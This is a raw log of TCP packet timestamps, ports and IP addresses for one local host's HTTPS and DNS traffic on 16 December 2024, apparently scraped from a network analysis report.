                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:35.210967064 CET49860443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:35.210975885 CET44349860116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:35.410093069 CET4434985720.42.73.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:35.410346031 CET4434985720.42.73.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:35.410955906 CET49857443192.168.2.820.42.73.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:35.411009073 CET4434985720.42.73.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:35.411025047 CET49857443192.168.2.820.42.73.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:35.411925077 CET49857443192.168.2.820.42.73.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:35.561839104 CET4434985820.42.73.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:35.561930895 CET4434985820.42.73.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:35.561990976 CET49858443192.168.2.820.42.73.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:35.562731028 CET49858443192.168.2.820.42.73.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:35.562753916 CET4434985820.42.73.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:35.594899893 CET44349859116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:35.595084906 CET49859443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:35.595531940 CET49859443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:35.595542908 CET44349859116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:35.597240925 CET49859443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:35.597248077 CET44349859116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:35.597278118 CET49859443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:35.597291946 CET44349859116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.615428925 CET44349860116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.615513086 CET49860443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.616457939 CET49860443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.616463900 CET44349860116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.618026972 CET49860443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.618041039 CET44349860116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.618068933 CET49860443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.618083000 CET44349860116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.618099928 CET49860443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.618103981 CET44349860116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.618130922 CET49860443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.618135929 CET44349860116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.618180990 CET49860443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.618191957 CET44349860116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:45.394332886 CET4434982723.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:45.394422054 CET49827443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:45.722997904 CET4434983323.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:45.723086119 CET4434983323.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:45.723134995 CET49833443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:49.321319103 CET4434984523.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:49.321506977 CET4434984523.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:49.321592093 CET49845443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:49.408143044 CET4434984423.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:49.408250093 CET4434984423.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:49.408314943 CET49844443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:49.721898079 CET49869443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:49.721951962 CET44349869116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:49.722026110 CET49869443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:49.722271919 CET49869443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:49.722289085 CET44349869116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:50.744807959 CET49870443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:50.744870901 CET44349870116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:50.744966030 CET49870443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:50.745192051 CET49870443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:50.745203018 CET44349870116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:51.123161077 CET44349869116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:51.123430014 CET49869443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:51.123838902 CET49869443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:51.123851061 CET44349869116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:51.125575066 CET49869443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:51.125579119 CET44349869116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:51.125669003 CET49869443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:51.125685930 CET44349869116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:51.125691891 CET49869443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:51.125698090 CET44349869116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:51.125792980 CET49869443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:51.125811100 CET44349869116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.144891977 CET44349870116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.144957066 CET49870443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.145360947 CET49870443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.145386934 CET44349870116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.146948099 CET49870443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.146958113 CET44349870116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.147008896 CET49870443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.147020102 CET44349870116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.432750940 CET44349869116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.432825089 CET44349869116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.432873011 CET49869443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.433763027 CET49869443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.433763027 CET49869443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.738544941 CET49869443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.738583088 CET44349869116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.771728992 CET49871443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.771770000 CET44349871116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.771822929 CET49871443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.772363901 CET49871443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.772382975 CET44349871116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.302987099 CET44349870116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.303085089 CET44349870116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.303164959 CET49870443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.303672075 CET49870443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.402174950 CET49870443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.402214050 CET44349870116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.793081045 CET49872443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.793140888 CET44349872116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.793210030 CET49872443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.793488979 CET49872443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.793508053 CET44349872116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.179291010 CET44349871116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.179373026 CET49871443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.179744959 CET49871443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.179752111 CET44349871116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.181391954 CET49871443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.181396008 CET44349871116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.181431055 CET49871443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.181436062 CET44349871116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.194895029 CET44349872116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.194978952 CET49872443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.195413113 CET49872443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.195422888 CET44349872116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.197043896 CET49872443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.197050095 CET44349872116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.197081089 CET49872443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.197089911 CET44349872116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.222179890 CET44349871116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.222258091 CET44349871116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.222259998 CET49871443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.222305059 CET49871443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.223102093 CET49871443192.168.2.8116.203.12.114
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.546503067 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.546633005 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.546649933 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.546721935 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.548758984 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.565128088 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.565923929 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.566348076 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.566363096 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.566409111 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.570686102 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.610165119 CET53574271.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.610693932 CET53600791.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.612885952 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.616808891 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.630300999 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.785204887 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.785823107 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.788623095 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.788851976 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.801968098 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.804411888 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.804694891 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.805083990 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.854304075 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.884001017 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.927443981 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.928411007 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.931390047 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.932372093 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.932471991 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.932622910 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.935731888 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.940273046 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.940457106 CET56535443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.945810080 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.946623087 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.947000980 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.947082043 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.947920084 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.950982094 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.955827951 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.124392986 CET44356535172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.124624968 CET44356535172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.124644995 CET44356535172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.124947071 CET44356535172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.125380993 CET56535443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.127542973 CET56535443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.129198074 CET56535443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.250206947 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.251182079 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.255275011 CET44356535172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.255477905 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.256253004 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.256462097 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.260185003 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.264202118 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.265716076 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.266576052 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.270519972 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.271855116 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.272099972 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.274110079 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.276206970 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.441468954 CET44356535172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.441524029 CET44356535172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.441538095 CET44356535172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.441551924 CET44356535172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.441942930 CET56535443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.442009926 CET56535443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.442657948 CET44356535172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.575558901 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.576738119 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.578511953 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.579114914 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.579974890 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.588881969 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.589477062 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.591037035 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.591619968 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.591710091 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.591797113 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.592004061 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.592541933 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.755925894 CET44356535172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.785288095 CET56535443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.254357100 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.254663944 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.265347958 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.266128063 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.266542912 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.275108099 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.286041975 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.286254883 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.291881084 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.299247026 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.299460888 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.311702013 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.318166971 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.318322897 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.324970961 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.333955050 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.334181070 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.346266985 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.351526976 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.351746082 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.358990908 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.370745897 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.371035099 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.376240969 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.385562897 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.385803938 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.393203020 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.401537895 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.402148962 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.414715052 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.418205023 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.418431044 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.439480066 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.439563990 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.440069914 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.443870068 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.451683998 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.451976061 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.460877895 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.468647957 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.468873024 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.477163076 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.485537052 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.485801935 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.494647026 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.502779007 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.503026962 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.511423111 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.519498110 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.519956112 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.527632952 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.538957119 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.545109987 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.546318054 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.558206081 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.558530092 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.561427116 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.569597006 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.569981098 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.578319073 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.587718964 CET4435345023.200.88.31192.168.2.8
